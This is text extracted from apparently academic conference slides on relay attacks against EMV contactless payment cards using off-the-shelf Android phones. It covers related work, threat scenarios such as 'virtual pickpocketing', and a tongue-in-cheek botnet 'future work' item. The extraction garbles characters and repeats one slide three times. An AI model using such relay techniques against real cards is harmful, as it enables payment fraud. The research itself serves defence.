    • Relay Attacks and Mafia Frauds
      • Android and NFC A Tale of Lve
        • Evolution of NFC Support in Android
        • Practical Implementation Alternatives in Android
          • Relay Attack Implementation
            • Demo experiment
            • Threat Scenarios
            • Resistant Mechanisms
              • Related Work
              • Conclusions
Page 47: Attacks in EMV Contactless Cards with Android OTS ... - · PDF fileRelay Attacks in EMV Contactless Cards with Android OTS Devices Jose Vila´ y, Ricardo J. Rodr´ıguez z pvtolkien@gmail.com,

Related WorkOn relay attacks

2005-2009 First works built on specific hardware

2010 Nokia mobile phones with NFC capability plus a Java MIDletapp

2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device

2014 Active relay attacks with custom hardware and customAndroid firmware

Several works studied delay upon relay channel

Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint

Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36

Conclusions (I)

Security of NFC is based on the physical proximity concern

NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising

Abuse to interact with cards in its proximity

ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices

Threat scenarios introduced

Virtual pickpocketing attack may appear before long

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36

Conclusions (I)

Security of NFC is based on the physical proximity concern

NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising

Abuse to interact with cards in its proximity

ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices

Threat scenarios introduced

Virtual pickpocketing attack may appear before long

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36

Conclusions (I)

Security of NFC is based on the physical proximity concern

NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising

Abuse to interact with cards in its proximity

ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices

Threat scenarios introduced

Virtual pickpocketing attack may appear before long

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36

Conclusions (II)

But then, what the hell can I do? Should I run away?

Conclusions (III)

Future Work
  Develop a botnet infrastructure and earn money
  Timing constraints of Android HCE mode
  Try active relay attacks against EMV contactless cards

Acknowledgments
  Spanish National Cybersecurity Institute (INCIBE)
  University of León under contract X43
  HITB staff

And thanks to all of you for listening to us!

Visit http://vwzq.net/relaynfc for more info about the project
